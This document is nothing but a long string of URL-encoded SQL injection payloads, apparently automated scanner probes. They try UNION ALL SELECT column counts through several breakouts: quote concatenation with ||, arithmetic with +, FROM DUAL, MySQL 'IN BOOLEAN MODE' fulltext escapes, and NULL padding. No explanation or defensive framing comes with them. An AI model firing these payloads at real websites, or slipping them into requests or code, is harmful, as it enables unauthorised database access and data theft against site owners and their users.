-8284%27%20%7C%7C%20%28SELECT%205800%20WHERE%203221%3D3221%20UNION%20ALL%20SELECT%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%2C%203221%23%20%29%20%7C%7C%20%27 -3569%27%20%7C%7C%20%28SELECT%206130%20WHERE%206771%3D6771%20UNION%20ALL%20SELECT%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%23%20%29%20%7C%7C%20%27 -4433%20%2B%20%28SELECT%203198%20FROM%20DUAL%20WHERE%205025%3D5025%20UNION%20ALL%20SELECT%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%2C%205025%23%20%29 -6543%20%2B%20%28SELECT%208232%20FROM%20DUAL%20WHERE%204050%3D4050%20UNION%20ALL%20SELECT%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%2C%204050%23%20%29 -7966%20%2B%20%28SELECT%201837%20FROM%20DUAL%20WHERE%207227%3D7227%20UNION%20ALL%20SELECT%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%2C%207227%23%20%29 -5921%20%2B%20%28SELECT%203723%20FROM%20DUAL%20WHERE%203395%3D3395%20UNION%20ALL%20SELECT%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%23%20%29 -4692%20%2B%20%28SELECT%201006%20FROM%20DUAL%20WHERE%204652%3D4652%20UNION%20ALL%20SELECT%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%2C%204652%23%20%29 -5689%20%2B%20%28SELECT%203498%20FROM%20DUAL%20WHERE%206307%3D6307%20UNION%20ALL%20SELECT%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%2C%206307%23%20%29 -4123%20%2B%20%28SELECT%207337%20FROM%20DUAL%20WHERE%201966%3D1966%20UNION%20ALL%20SELECT%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%2C%201966%23%20%29 -6850%20%2B%20%28SELECT%201276%20FROM%20DUAL%20WHERE%201859%3D1859%20UNION%20ALL%20SELECT%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%23%20%29 -3184%20%2B%20%28SELECT%206908%20FROM%20DUAL%20WHERE%208104%3D8104%20UNION%20ALL%20SELECT%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%2C%208104%23%20%29 -4555%20%2B%20%28SELECT%202808%20FROM%20DUAL%20WHERE%208158%3D8158%20UNION%20ALL%20SELECT%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%2C%208158%23%20%29 -9648%20%2B%20%28SELECT%205454%20WHERE%202131%3D2131%20UNION%20ALL%20SELECT%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%23%20%29 -2061%20%2B%20%28SELECT%208000%20WHERE%202177%3D2177%20UNION%20ALL%20SELECT%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%2C%202177%23%20%29 -2564%20%2B%20%28SELECT%209222%20WHERE%207027%3D7027%20UNION%20ALL%20SELECT%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%2C%207027%23%20%29 -1221%20%2B%20%28SELECT%208123%20WHERE%209357%3D9357%20UNION%20ALL%20SELECT%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%2C%209357%23%20%29 -3038%20%2B%20%28SELECT%207242%20WHERE%205502%3D5502%20UNION%20ALL%20SELECT%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%2C%205502%23%20%29 -2409%20%2B%20%28SELECT%203305%20WHERE%208962%3D8962%20UNION%20ALL%20SELECT%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%2C%208962%23%20%29 -8218%20%2B%20%28SELECT%203790%20WHERE%205833%3D5833%20UNION%20ALL%20SELECT%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%2C%205833%23%20%29 -6021%20%2B%20%28SELECT%206118%20WHERE%207452%3D7452%20UNION%20ALL%20SELECT%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%2C%207452%23%20%29 -4624%20%2B%20%28SELECT%202094%20WHERE%207725%3D7725%20UNION%20ALL%20SELECT%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%2C%207725%23%20%29 -7085%20%2B%20%28SELECT%201786%20WHERE%203053%3D3053%20UNION%20ALL%20SELECT%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%2C%203053%23%20%29 -5641%27%20%2B%20%28SELECT%20%27PTdT%27%20FROM%20DUAL%20WHERE%207516%3D7516%20UNION%20ALL%20SELECT%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%2C%207516%23%20%29%20%2B%20%27 -3708%27%20%2B%20%28SELECT%20%27oJRT%27%20FROM%20DUAL%20WHERE%207506%3D7506%20UNION%20ALL%20SELECT%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%23%20%29%20%2B%20%27 -4913%27%20%2B%20%28SELECT%20%27HEaB%27%20FROM%20DUAL%20WHERE%202086%3D2086%20UNION%20ALL%20SELECT%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%23%20%29%20%2B%20%27 -6947%27%20%2B%20%28SELECT%20%27zJzF%27%20FROM%20DUAL%20WHERE%202848%3D2848%20UNION%20ALL%20SELECT%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%23%20%29%20%2B%20%27 -1406%27%20%2B%20%28SELECT%20%27ydWk%27%20FROM%20DUAL%20WHERE%209220%3D9220%20UNION%20ALL%20SELECT%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%2C%209220%23%20%29%20%2B%20%27 -2358%27%20%2B%20%28SELECT%20%27rBMl%27%20FROM%20DUAL%20WHERE%202555%3D2555%20UNION%20ALL%20SELECT%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%23%20%29%20%2B%20%27 -6335%27%20%2B%20%28SELECT%20%27OfHr%27%20FROM%20DUAL%20WHERE%209873%3D9873%20UNION%20ALL%20SELECT%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%2C%209873%23%20%29%20%2B%20%27 -1806%27%20%2B%20%28SELECT%20%27oRJH%27%20FROM%20DUAL%20WHERE%208781%3D8781%20UNION%20ALL%20SELECT%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%2C%208781%23%20%29%20%2B%20%27 -8923%27%20%2B%20%28SELECT%20%27ihGR%27%20FROM%20DUAL%20WHERE%206802%3D6802%20UNION%20ALL%20SELECT%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%2C%206802%23%20%29%20%2B%20%27 -1576%27%20%2B%20%28SELECT%20%27DdwA%27%20FROM%20DUAL%20WHERE%205202%3D5202%20UNION%20ALL%20SELECT%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%23%20%29%20%2B%20%27 -7001%27%20%2B%20%28SELECT%20%27vVUO%27%20WHERE%206971%3D6971%20UNION%20ALL%20SELECT%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%2C%206971%23%20%29%20%2B%20%27 -4894%27%20%2B%20%28SELECT%20%27WyFR%27%20WHERE%209604%3D9604%20UNION%20ALL%20SELECT%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%2C%209604%23%20%29%20%2B%20%27 -7613%27%20%2B%20%28SELECT%20%27tihL%27%20WHERE%204068%3D4068%20UNION%20ALL%20SELECT%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%23%20%29%20%2B%20%27 -4382%27%20%2B%20%28SELECT%20%27HRRS%27%20WHERE%205191%3D5191%20UNION%20ALL%20SELECT%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%2C%205191%23%20%29%20%2B%20%27 -1193%27%20%2B%20%28SELECT%20%27nCet%27%20WHERE%203393%3D3393%20UNION%20ALL%20SELECT%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%23%20%29%20%2B%20%27 -9410%27%20%2B%20%28SELECT%20%27vdAW%27%20WHERE%201789%3D1789%20UNION%20ALL%20SELECT%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%2C%201789%23%20%29%20%2B%20%27 -5451%27%20%2B%20%28SELECT%20%27iwuA%27%20WHERE%201934%3D1934%20UNION%20ALL%20SELECT%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%23%20%29%20%2B%20%27 -1539%27%20%2B%20%28SELECT%20%27wTjQ%27%20WHERE%205389%3D5389%20UNION%20ALL%20SELECT%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%2C%205389%23%20%29%20%2B%20%27 -8864%27%20%2B%20%28SELECT%20%27impW%27%20WHERE%204451%3D4451%20UNION%20ALL%20SELECT%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%2C%204451%23%20%29%20%2B%20%27 -4822%27%20%2B%20%28SELECT%20%27ftDK%27%20WHERE%202212%3D2212%20UNION%20ALL%20SELECT%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%2C%202212%23%20%29%20%2B%20%27 -8081%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%2C%205044%23%20%23 -8292%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%2C%208151%23%20%23 -7283%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%23%20%23 -2029%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%2C%201582%23%20%23 -3258%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%2C%204124%23%20%23 -7471%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%2C%202067%23%20%23 -3129%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%23%20%23 -6872%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%2C%208801%23%20%23 -7565%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%23%20%23 -7198%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%23%20%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 